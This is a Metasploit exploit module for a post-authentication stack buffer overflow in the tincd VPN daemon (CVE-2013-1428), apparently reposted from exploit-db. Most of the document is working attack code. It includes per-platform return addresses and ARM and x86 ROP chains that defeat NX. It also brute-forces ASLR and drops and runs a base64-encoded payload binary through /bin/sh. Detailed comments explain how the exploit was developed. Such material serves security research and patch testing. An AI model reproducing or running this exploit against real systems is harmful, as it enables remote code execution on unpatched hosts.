Tincd – (Authenticated) Remote TCP Stack Buffer Overflow (Metasploit)

  • 作者: Metasploit
    日期: 2014-12-02
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/35441/
  • ##
    # This module requires Metasploit: http://metasploit.com/download
    # Current source: https://github.com/rapid7/metasploit-framework
    ##
    
    require 'msf/core'
    require 'securerandom'
    
    class Metasploit3 < Msf::Exploit::Remote
    Rank = AverageRanking
    
    include Msf::Exploit::EXE
    include Msf::Exploit::Remote::TincdExploitClient
    
    def initialize(info = {})
    super(update_info(info,
    'Name' => 'Tincd Post-Authentication Remote TCP Stack Buffer Overflow',
    'Description'=> %q{
    This module exploits a stack buffer overflow in Tinc's tincd
    service. After authentication, a specially crafted tcp packet (default port 655)
    leads to a buffer overflow and allows to execute arbitrary code. This module has
    been tested with tinc-1.1pre6 on Windows XP (custom calc payload) and Windows 7
    (windows/meterpreter/reverse_tcp), and tinc version 1.0.19 from the ports of
    FreeBSD 9.1-RELEASE # 0 and various other OS, see targets. The exploit probably works
    for all versions <= 1.1pre6.
    A manually compiled version (1.1.pre6) on Ubuntu 12.10 with gcc 4.7.2 seems to
    be a non-exploitable crash due to calls to __memcpy_chk depending on how tincd
    was compiled. Bug got fixed in version 1.0.21/1.1pre7. While writing this module
    it was recommended to the maintainer to start using DEP/ASLR and other protection
    mechanisms.
    },
    'Author' =>
    [
    # PoC changes (mostly reliability), port python to ruby, exploitation including ROP, support for all OS, metasploit module
    'Tobias Ospelt <tobias[at]modzero.ch>', # @floyd_ch
    # original finding, python PoC crash
    'Martin Schobert <schobert[at]modzero.ch>' # @nitram2342
    ],
    'References' =>
    [
    ['CVE', '2013-1428'],
    ['OSVDB', '92653'],
    ['BID', '59369'],
    ['URL', 'http://www.floyd.ch/?p=741'],
    ['URL', 'http://sitsec.net/blog/2013/04/22/stack-based-buffer-overflow-in-the-vpn-software-tinc-for-authenticated-peers/'],
    ['URL', 'http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=2013-1428']
    ],
    'DefaultOptions' =>
    {
    'EXITFUNC' => 'process'
    },
    'Payload'=>
    {
    'Space'=> 1675,
    'DisableNops' => true
    },
    'Privileged' => true,
    'Targets'=>
    [
    # full exploitation x86:
    ['Windows XP x86, tinc 1.1.pre6 (exe installer)',{ 'Platform' => 'win', 'Ret' => 0x0041CAA6, 'offset' => 1676 }],
    ['Windows 7 x86, tinc 1.1.pre6 (exe installer)',{ 'Platform' => 'win', 'Ret' => 0x0041CAA6, 'offset' => 1676 }],
    ['FreeBSD 9.1-RELEASE # 0 x86, tinc 1.0.19 (ports)', { 'Platform' => 'bsd', 'Ret' => 0x0804BABB, 'offset' => 1676 }],
    ['Fedora 19 x86 ROP (NX), write binary to disk payloads, tinc 1.0.20 (manual compile)', {
    'Platform' => 'linux', 'Arch' => ARCH_X86, 'Ret' => 0x4d10ee87, 'offset' => 1676 }
    ],
    ['Fedora 19 x86 ROP (NX), CMD exec payload, tinc 1.0.20 (manual compile)', {
    'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Ret' => 0x4d10ee87, 'offset' => 1676 }
    ],
    ['Archlinux 2013.04.01 x86, tinc 1.0.20 (manual compile)',{ 'Platform' => 'linux', 'Ret' => 0x08065929, 'offset' => 1676 }],
    ['OpenSuse 11.2 x86, tinc 1.0.20 (manual compile)',{ 'Platform' => 'linux', 'Ret' => 0x0804b07f, 'offset' => 1676 }],
    # full exploitation ARM:
    ['Pidora 18 ARM ROP(NX)/ASLR brute force, write binary to disk payloads, tinc 1.0.20 (manual compile with restarting daemon)',{
    'Platform' => 'linux', 'Arch' => ARCH_ARMLE, 'Ret' => 0x00015cb4, 'offset' => 1668 }
    ],
    ['Pidora 18 ARM ROP(NX)/ASLR brute force, CMD exec payload, tinc 1.0.20 (manual compile with restarting daemon)',{
    'Platform' => 'linux', 'Arch' => ARCH_CMD, 'Ret' => 0x00015cb4, 'offset' => 1668 }
    ],
    # crash only:
    ['Crash only: Ubuntu 12.10 x86, tinc 1.1.pre6 (apt-get or manual compile)',{ 'Platform' => 'linux', 'Ret' => 0x0041CAA6, 'offset' => 1676 }],
    ['Crash only: Fedora 16 x86, tinc 1.0.19 (yum)',{ 'Platform' => 'linux', 'Ret' => 0x0041CAA6, 'offset' => 1676 }],
    ['Crash only: OpenSuse 11.2 x86, tinc 1.0.16 (rpm package)',{ 'Platform' => 'linux', 'Ret' => 0x0041CAA6, 'offset' => 1676 }],
    ['Crash only: Debian 7.3 ARM, tinc 1.0.19 (apt-get)',{ 'Platform' => 'linux', 'Ret' => 0x9000, 'offset' => 1668 }]
    ],
    'DisclosureDate' => 'Apr 22 2013', # finding, msf module: Dec 2013
    'DefaultTarget'=> 0))
    
    register_options(
    [ # Only for shellcodes that write binary to disk
    # Has to be short, usually either . or /tmp works
    # /tmp could be mounted as noexec
    # . is usually only working if tincd is running as root
    OptString.new('BINARY_DROP_LOCATION', [false, 'Short location to drop executable on server, usually /tmp or .', '/tmp']),
    OptInt.new('BRUTEFORCE_TRIES', [false, 'How many brute force tries (ASLR brute force)', 200]),
    OptInt.new('WAIT', [false, 'Waiting time for server daemon restart (ASLR brute force)', 3])
    ], self
    )
    end
    
    def exploit
    # #
    # x86
    # #
    # WINDOWS XP and 7 full exploitation
    # Simple, we only need some mona.py magic
    # C:\Program Files\tinc>"C:\Program Files\Immunity Inc\Immunity Debugger\ImmunityDebugger.exe" "C:\Program Files\tinc\tincd.exe -D -d 5"
    # !mona config -set workingfolder c:\logs\%p
    # !mona pc 1682
    #--> C:\logs\tincd\pattern
    # !mona findmsp
    # Straight forward, when we overwrite EIP the second value
    # on the stack is pointing to our payload.
    # !mona findwild -o -type instr -s "pop r32# ret"
    
    # FREEBSD full exploitation
    # Same offset as windows, same exploitation method
    # But we needed a new pop r32# ret for the freebsd version
    # No mona.py help on bsd or linux so:
    # - Dumped .text part of tincd binary in gdb
    # - Search in hex editor for opcodes for "pop r32# ret":
    #58c3, 59c3, ..., 5fc3
    # - Found a couple of 5dc3. ret = start of .text + offset in hex editor
    # - 0x0804BABB works very well
    
    # UBUNTU crash only
    # Manually compiled version (1.1.pre6) on Ubuntu 12.10 with gcc 4.7.2 seems to be a non-exploitable crash, because
    # the bug is in a fixed size (MAXSIZE) struct member variable. The size of the destination is known
    # at compile time. gcc is introducing a call to __memcpy_chk:
    # http://gcc.gnu.org/svn/gcc/branches/cilkplus/libssp/memcpy-chk.c
    # memcpy_chk does a __chk_fail call if the destination buffer is smaller than the source buffer. Therefore it will print
    # *** buffer overflow detected *** and terminate (SIGABRT). The same result for tincd 10.0.19 which can be installed
    # from the repository. It might be exploitable for versions compiled with an older version of gcc.
    # memcpy_chk seems to be in gcc since 2005:
    # http://gcc.gnu.org/svn/gcc/branches/cilkplus/libssp/memcpy-chk.c
    # http://gcc.gnu.org/git/?p=gcc.git;a=history;f=libssp/memcpy-chk.c;hb=92920cc62318e5e8b6d02d506eaf66c160796088
    
    # OPENSUSE
    # OpenSuse 11.2
    # Installation as described on the tincd website. For 11.2 there are two versions.
    # Decided for 1.0.16 as this is a vulnerable version
    # wget "http://download.opensuse.org/repositories/home:/seilerphilipp/SLE_11_SP2/i586/tinc-1.0.16-3.1.i586.rpm"
    # rpm -i tinc-1.0.16-3.1.i586.rpm
    # Again, strace shows us that the buffer overflow was detected (see Ubuntu)
    # writev(2, [{"*** ", 4}, {"buffer overflow detected", 24}, {" ***: ", 6}, {"tincd", 5}, {" terminated\n", 12}], 5) = 51
    # So a crash-only non-exploitable bof here. So let's go for manual install:
    # wget 'http://www.tinc-vpn.org/packages/tinc-1.0.20.tar.gz'
    # yast -i gcc zlib zlib-devel && echo "yast is still ugly" && zypper install lzo-devel libopenssl-devel make && make && make install
    # Exploitable. Let's see:
    # tincd is mapped at 0x8048000. There is a 5d3c at offset 307f in the tincd binary. this means:
    # the offset to pop ebp; ret is 0x0804b07f
    
    # FEDORA
    # Fedora 16
    # yum has version 1.0.19
    # yum install tinc
    # Non-exploitable crash, see Ubuntu. Strace tells us:
    # writev(2, [{"*** ", 4}, {"buffer overflow detected", 24}, {" ***: ", 6}, {"tincd", 5}, {" terminated\n", 12}], 5) = 51
    # About yum: Fedora 17 has fixed version 1.0.21, Fedora 19 fixed version 1.0.23
    # Manual compile went on with Fedora 19
    # wget 'http://www.tinc-vpn.org/packages/tinc-1.0.20.tar.gz'
    # yum install gcc zlib-devel.i686 lzo-devel.i686 openssl-devel.i686 && ./configure && make && make install
    # Don't forget to stop firewalld for testing, as the port is still closed otherwise
    # # hardening-check tincd
    # tincd:
    #Position Independent Executable: no, normal executable!
    #Stack protected: no, not found!
    #Fortify Source functions: no, only unprotected functions found!
    #Read-only relocations: yes
    #Immediate binding: no, not found!
    # Running this module with target set to Windows:
    # Program received signal SIGSEGV, Segmentation fault.
    # 0x0041caa6 in ?? ()
    # well and that's our windows offset...
    # (gdb) info proc mappings
    # 0x80480000x80680000x200000x0 /usr/local/sbin/tincd
    # After finding a normal 5DC3 (pop ebp# ret) at offset 69c3 of the binary we
    # can try to execute the payload on the stack, but:
    # (gdb) stepi
    # Program received signal SIGSEGV, Segmentation fault.
    # 0x08e8ee08 in ?? ()
    # Digging deeper we find:
    # dmesg | grep protection
    # [0.000000] NX (Execute Disable) protection: active
    # or:
    # # objdump -x /usr/local/sbin/tincd
    # [...] STACK off0x00000000 vaddr 0x00000000 paddr 0x00000000 align 2**4
    # filesz 0x00000000 memsz 0x00000000 flags rw-
    # or: https://bugzilla.redhat.com/show_bug.cgi?id=996365
    # Time for ROP
    # To start the ROP we need a POP r32# POP ESP# RET (using the first four bytes of the shellcode
    # as a pointer to instructions). Was lucky after some searching:
    # (gdb) x/10i 0x4d10ee87
    #0x4d10ee87:pop%ebx
    #0x4d10ee88:mov$0xf5d299dd,%eax
    #0x4d10ee8d:rcr%cl,%al
    #0x4d10ee8f:pop%esp
    #0x4d10ee90:ret
    
    # ARCHLINUX
    # archlinux-2013.04.01 pacman has fixed version 1.0.23, so went for manual compile:
    # wget 'http://www.tinc-vpn.org/packages/tinc-1.0.20.tar.gz'
    # pacman -S gcc zlib lzo openssl make && ./configure && make && make install
    # Offset in binary to 58c3: 0x1D929 + tincd is mapped at starting address 0x8048000
    # -->Ret: 0x8065929
    # No NX protection, it simply runs the shellcode :)
    
    # #
    # ARM
    # #
    # ARM Pidora 18 (Raspberry Pi Fedora Remix) on a physical Raspberry Pi
    # Although this is more for the interested reader, as Pidora development
    # already stopped... Raspberry Pi's are ARM1176JZF-S (700 MHz) CPUs
    # meaning it's an ARMv6 architecture
    # yum has fixed version 1.0.21, so went for manual compile:
    # wget 'http://www.tinc-vpn.org/packages/tinc-1.0.20.tar.gz'
    # yum install gdb gcc zlib-devel lzo-devel openssl-devel && ./configure && make && make install
    # Is the binary protected?
    # wget "http://www.trapkit.de/tools/checksec.sh" && chmod +x checksec.sh
    # # ./checksec.sh --file /usr/local/sbin/tincd
    # RELRO STACK CANARYNXPIE RPATHRUNPATHFILE
    # No RELRONo canary found NX enabledNo PIENo RPATH No RUNPATH /usr/local/sbin/tincd
    # so again NX... but what about the system things?
    #cat /proc/sys/kernel/randomize_va_space
    # 2
    # --> "Randomize the positions of the stack, VDSO page, shared memory regions, and the data segment.
    #This is the default setting."
    # Here some examples of the address of the system function:
    # 0xb6c40848
    # 0xb6cdd848
    # 0xb6c7c848
    # Looks like we would have to brute force one byte
    # (gdb) info proc mappings
    #0x80000x230000x1b0000 /usr/local/sbin/tincd
    # 0x2b0000x2c000 0x10000x1b000 /usr/local/sbin/tincd
    # When we exploit we get the following:
    # Program received signal SIGSEGV, Segmentation fault.
    # 0x90909090 in ?? ()
    # ok, finally a different offset to eip. Let's figure it out:
    # $ tools/pattern_create.rb 1676
    # Ok, pretty close, it's 1668. If we randomly choose ret as 0x9000 we get:
    # (gdb) break *0x9000
    # Breakpoint 1 at 0x9000
    # See that our shellcode is *on* the stack:
    # (gdb) x/10x $sp
    # 0xbee14308: 0x00000698 0x00000000 0x00000000 0x00000698
    # 0xbee14318: 0x31203731 0x0a323736 0xe3a00002 0xe3a01001 <-- 0xe3a00002 is the start of our shellcode
    # 0xbee14328: 0xe3a02006 0xe3a07001
    # let's explore the code we can reuse:
    # (gdb) info functions
    # objdump -d /usr/local/sbin/tincd >assembly.txt
    # while simply searching for the bx instruction we were not very lucky,
    # but searching for some "pop pc" it's easy to find nice gadgets.
    # we can write arguments to the .data section again:
    # 0x2b3f0->0x2b4ac at 0x0001b3f0: .data ALLOC LOAD DATA HAS_CONTENTS
    # The problem is we can not reliably forecast the system function's address, but it's
    # only one byte random, therefore we have to brute force it and/or find a memory leak.
    # Let's assume it's a restarting daemon:
    # create /etc/systemd/system/tincd.service and fill in Restart=restart-always
    
    # ARM Debian Wheezy on qemu
    # root@debian:~# apt-cache showpkg tinc
    # Package: tinc
    # Versions:
    # 1.0.19-3 (/var/lib/apt/lists/ftp.halifax.rwth-aachen.de_debian_dists_wheezy_main_binary-armhf_Packages)
    # nice, that's vulnerable
    # apt-get install tinc
    # apt-get install elfutils && ln -s /usr/bin/eu-readelf /usr/bin/readelf
    # wget "http://www.trapkit.de/tools/checksec.sh" && chmod +x checksec.sh
    # # ./checksec.sh --file /usr/sbin/tincd
    # RELRO STACK CANARYNXPIE RPATHRUNPATHFILE
    # Partial RELRO Canary foundNX enabledNo PIENo RPATH No RUNPATH /usr/sbin/tincd
    # Puh, doesn't look too good for us, NX enabled, Stack canary present and a partial RELRO, I'm not going to cover this one here
    
    packet_payload = payload.encoded
    # Pidora and Fedora/ROP specific things
    if target.name =~ /Pidora 18/ || target.name =~ /Fedora 19/
    rop_generator = nil
    filename = rand_text_alpha(1)
    cd = "cd #{datastore['BINARY_DROP_LOCATION']};"
    cd = '' if datastore['BINARY_DROP_LOCATION'] == '.'
    
    if target.name =~ /Pidora 18/
    print_status('Using ROP and brute force ASLR guesses to defeat NX/ASLR on ARMv6 based Pidora 18')
    print_status('This requires a restarting tincd daemon!')
    print_status('Warning: This is likely to get tincd into a state where it doesn\'t accept connections anymore')
    rop_generator = method(:create_pidora_rop)
    elsif target.name =~ /Fedora 19/
    print_status('Using ROP to defeat NX on Fedora 19')
    rop_generator = method(:create_fedora_rop)
    end
    
    if target.arch.include? ARCH_CMD
    # The CMD payloads are a bit tricky on Fedora. As of december 2013
    # some of the generic unix payloads (e.g. reverse shell with awk) don't work
    # (even when executed directly in a terminal on Fedora)
    # use generic/custom and specify PAYLOADSTR without single quotes
    # it's usually sh -c *bla*
    packet_payload = create_fedora_rop(payload.encoded.split(' ', 3))
    else
    # the binary drop payloads
    packet_payload = get_cmd_binary_drop_payload(filename, cd, rop_generator)
    if packet_payload.length > target['offset']
    print_status("Plain version too big (#{packet_payload.length}, max. #{target['offset']}), trying zipped version")
    packet_payload = get_gzip_cmd_binary_drop_payload(filename, cd, rop_generator)
    vprint_status("Achieved version with #{packet_payload.length} bytes")
    end
    end
    end
    
    if packet_payload.length > target['offset']
    fail_with(Exploit::Failure::BadConfig, "The resulting payload has #{packet_payload.length} bytes, we only have #{target['offset']} space.")
    end
    injection = packet_payload + rand_text_alpha(target['offset'] - packet_payload.length) + [target.ret].pack('V')
    
    vprint_status("Injection starts with #{injection.unpack('H*')[0][0..30]}...")
    
    if target.name =~ /Pidora 18/
    # we have to brute force to defeat ASLR
    datastore['BRUTEFORCE_TRIES'].times do
    print_status("Try #{n}: Initializing tinc exploit client (setting up ciphers)")
    setup_ciphers
    print_status('Telling tinc exploit client to connect, handshake and send the payload')
    begin
    send_recv(injection)
    rescue RuntimeError, Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, ::Timeout::Error, ::EOFError => runtime_error
    print_error(runtime_error.message)
    print_error(runtime_error.backtrace.join("\n\t"))
    rescue Rex::ConnectionRefused
    print_error('Server refused connection. Is this really a restarting daemon? Try higher WAIT option.')
    sleep(3)
    next
    end
    secs = datastore['WAIT']
    print_status("Waiting #{secs} seconds for server to restart daemon (which will change the ASLR byte)")
    sleep(secs)
    end
    print_status("Brute force with #{datastore['BRUTEFORCE_TRIES']} tries done. If not successful you could try again.")
    else
    # Setup local ciphers
    print_status('Initializing tinc exploit client (setting up ciphers)')
    setup_ciphers
    # The tincdExploitClient will do the crypto handshake with the server and
    # send the injection (a packet), where the actual buffer overflow is triggered
    print_status('Telling tinc exploit client to connect, handshake and send the payload')
    send_recv(injection)
    end
    print_status('Exploit finished')
    end
    
    def get_cmd_binary_drop_payload(filename, cd, rop_generator)
    elf_base64 = Rex::Text.encode_base64(generate_payload_exe)
    cmd = ['/bin/sh', '-c', "#{cd}echo #{elf_base64}|base64 -d>#{filename};chmod +x #{filename};./#{filename}"]
    vprint_status("You will try to execute #{cmd.join(' ')}")
    rop_generator.call(cmd)
    end
    
    def get_gzip_cmd_binary_drop_payload(filename, cd, rop_generator)
    elf_zipped_base64 = Rex::Text.encode_base64(Rex::Text.gzip(generate_payload_exe))
    cmd = ['/bin/sh', '-c', "#{cd}echo #{elf_zipped_base64}|base64 -d|gunzip>#{filename};chmod +x #{filename};./#{filename}"]
    vprint_status("You will try to execute #{cmd.join(' ')}")
    rop_generator.call(cmd)
    end
    
    def create_pidora_rop(sys_execv_args)
    sys_execv_args = sys_execv_args.join(' ')
    sys_execv_args += "\x00"
    
    aslr_byte_guess = SecureRandom.random_bytes(1).ord
    print_status("Using 0x#{aslr_byte_guess.to_s(16)} as random byte for ASLR brute force (hope the server will use the same at one point)")
    
    # Gadgets tincd
    # c714:	e1a00004 	mov	r0, r4
    # c718:	e8bd8010 	pop	{r4, pc}
    mov_r0_r4_pop_r4_ret = [0x0000c714].pack('V')
    pop_r4_ret = [0x0000c718].pack('V')
    # 1cef4:	e580400c 	str	r4, [r0, #12]
    # 1cef8:	e8bd8010 	pop	{r4, pc}
    # mov_r0_plus_12_to_r4_pop_r4_ret = [0x0001cef4].pack('V')
    
    # bba0:	e5843000 	str	r3, [r4]
    # bba4:	e8bd8010 	pop	{r4, pc}
    mov_to_r4_addr_pop_r4_ret = [0x0000bba0].pack('V')
    
    # 13ccc:	e1a00003 	mov	r0, r3
    # 13cd0:	e8bd8008 	pop	{r3, pc}
    pop_r3_ret = [0x00013cd0].pack('V')
    
    # address to start rop (removing 6 addresses of garbage from stack)
    # 15cb4:	e8bd85f0 	pop	{r4, r5, r6, r7, r8, sl, pc}
    # start_rop = [0x00015cb4].pack('V')
    # see target Ret
    
    # system function address base to brute force
    # roughly 500 tests showed addresses between
    # 0xb6c18848 and 0xb6d17848 (0xff distance)
    system_addr = [0xb6c18848 + (aslr_byte_guess * 0x1000)].pack('V')
    
    # pointer into .data section
    loc_dot_data = 0x0002b3f0 # a location inside .data
    
    # Rop into system(), prepare address of payload in r0
    rop = ''
    
    # first, let's put the payload into the .data section
    
    # Put the first location to write to in r4
    rop += pop_r4_ret
    
    sys_execv_args.scan(/.{1,4}/).each_with_index do |argument_part, i|
    # Give location inside .data via stack
    rop += [loc_dot_data + i * 4].pack('V')
    # Pop 4 bytes of the command into r3
    rop += pop_r3_ret
    # Give 4 bytes of command on stack
    if argument_part.length == 4
    rop += argument_part
    else
    rop += argument_part + rand_text_alpha(4 - argument_part.length)
    end
    # Write the 4 bytes to the writable location
    rop += mov_to_r4_addr_pop_r4_ret
    end
    
    # put the address of the payload into r4
    rop += [loc_dot_data].pack('V')
    
    # now move r4 to r0
    rop += mov_r0_r4_pop_r4_ret
    rop += rand_text_alpha(4)
    # we don't care what ends up in r4 now
    
    # call system
    rop += system_addr
    end
    
    def create_fedora_rop(sys_execv_args)
    # Gadgets tincd
    loc_dot_data = 0x80692e0 # a location inside .data
    pop_eax = [0x8065969].pack('V') # pop eax; ret
    pop_ebx = [0x8049d8d].pack('V') # pop ebx; ret
    pop_ecx = [0x804e113].pack('V') # pop ecx; ret
    xor_eax_eax = [0x804cd60].pack('V') # xor eax eax; ret
    # <ATTENTION> This one destroys ebx:
    mov_to_eax_addr = [0x805f2c2].pack('V') + rand_text_alpha(4) # mov [eax] ecx ; pop ebx ; ret
    # </ATTENTION>
    
    # Gadgets libcrypto.so.10 libcrypto.so.1.0.1e
    xchg_ecx_eax = [0x4d170d1f].pack('V') # xchg ecx,eax; ret
    # xchg_edx_eax = [0x4d25afa3].pack('V') # xchg edx,eax ; ret
    # inc_eax = [0x4d119ebc].pack('V') # inc eax ; ret
    
    # Gadgets libc.so.6 libc-2.17.so
    pop_edx = [0x4b5d7aaa].pack('V') # pop edx; ret
    int_80 = [0x4b6049c5].pack('V') # int 0x80
    
    # Linux kernel system call 11: sys_execve
    # ROP
    rop = ''
    
    index = 0
    stored_argument_pointer_offsets = []
    
    sys_execv_args.each_with_index do |argument, argument_no|
    stored_argument_pointer_offsets << index
    argument.scan(/.{1,4}/).each_with_index do |argument_part, i|
    # Put location to write to in eax
    rop += pop_eax
    # Give location inside .data via stack
    rop += [loc_dot_data + index + i * 4].pack('V')
    # Pop 4 bytes of the command into ecx
    rop += pop_ecx
    # Give 4 bytes of command on stack
    if argument_part.length == 4
    rop += argument_part
    else
    rop += argument_part + rand_text_alpha(4 - argument_part.length)
    end
    # Write the 4 bytes to the writable location
    rop += mov_to_eax_addr
    end
    # We have to end the argument with a zero byte
    index += argument.length
    # We don't have "xor ecx, ecx", but we have it for eax...
    rop += xor_eax_eax
    rop += xchg_ecx_eax
    # Put location to write to in eax
    rop += pop_eax
    # Give location inside .data via stack
    rop += [loc_dot_data + index].pack('V')
    # Write the zeros
    rop += mov_to_eax_addr
    index += 1 # where we can write the next argument
    end
    
    # Append address of the start of each argument
    stored_argument_pointer_offsets.each do |offset|
    rop += pop_eax
    rop += [loc_dot_data + index].pack('V')
    rop += pop_ecx
    rop += [loc_dot_data + offset].pack('V')
    rop += mov_to_eax_addr
    index += 4
    end
    # end with zero
    rop += xor_eax_eax
    rop += xchg_ecx_eax
    
    rop += pop_eax
    rop += [loc_dot_data + index].pack('V')
    rop += mov_to_eax_addr
    
    rop += pop_ebx
    rop += [loc_dot_data].pack('V')
    
    rop += pop_ecx
    rop += [loc_dot_data + sys_execv_args.join(' ').length + 1].pack('V')
    
    rop += pop_edx
    rop += [loc_dot_data + index].pack('V')
    
    # sys call 11 = sys_execve
    rop += pop_eax
    rop += [0x0000000b].pack('V')
    
    rop += int_80
    end
    end